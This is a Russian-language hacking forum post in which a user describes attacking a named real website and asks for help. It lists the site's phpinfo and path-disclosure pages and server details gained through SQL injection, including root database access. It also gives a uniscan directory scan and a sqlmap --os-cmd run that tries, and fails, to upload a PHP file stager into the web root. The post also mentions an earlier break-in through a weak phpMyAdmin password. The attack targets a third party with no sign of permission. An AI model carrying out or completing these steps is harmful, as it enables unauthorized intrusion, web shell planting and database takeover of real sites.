Ваши вопросы по уязвимостям.

#11

17.10.2015, 16:45

aldemko

Познающий

Регистрация: 07.09.2015

Сообщений: 36

С нами: 5622806

Репутация: 0

С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан

Я начал искать новые ресурсы для обучения и практики

и так ресурс:

http://www.aza.com.ua

phpinfdo http://www.aza.com.ua/info.php

страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html

немного о сервере

web server operating system: Windows

web application technology: Apache 2.2.21, PHP 5.2.17

back-end DBMS: MySQL 5.0

current user: 'root@localhost'

current database: 'test'

current user is DBA: True

uniscan по ключу --qwe

показывает (если я правильно понял) папки с правами на запись

| Directory check:

| [+] CODE: 200 URL: http://www.aza.com.ua/banner/

| [+] CODE: 200 URL: http://www.aza.com.ua/cart/

| [+] CODE: 200 URL: http://www.aza.com.ua/conf/

| [+] CODE: 200 URL: http://www.aza.com.ua/doc/

| [+] CODE: 200 URL: http://www.aza.com.ua/email/

| [+] CODE: 200 URL: http://www.aza.com.ua/edit/

| [+] CODE: 200 URL: http://www.aza.com.ua/images/

| [+] CODE: 200 URL: http://www.aza.com.ua/img/

| [+] CODE: 200 URL: http://www.aza.com.ua/japan/

| [+] CODE: 200 URL: http://www.aza.com.ua/news/

| [+] CODE: 200 URL: http://www.aza.com.ua/orders/

| [+] CODE: 200 URL: http://www.aza.com.ua/pma/

| [+] CODE: 200 URL: http://www.aza.com.ua/quest/

| [+] CODE: 200 URL: http://www.aza.com.ua/user/

затем используя sqlmap-u сайт --os-cmd –v l

выбираю 4 (php)

затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:

Код:

please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'

подскажите что я не так делаю ?

Проблема в пути который указываю в sqlmap

или в том что статус 200 в uniscan Не имеет в виду что права на запись есть

или еще что то ?

спасибо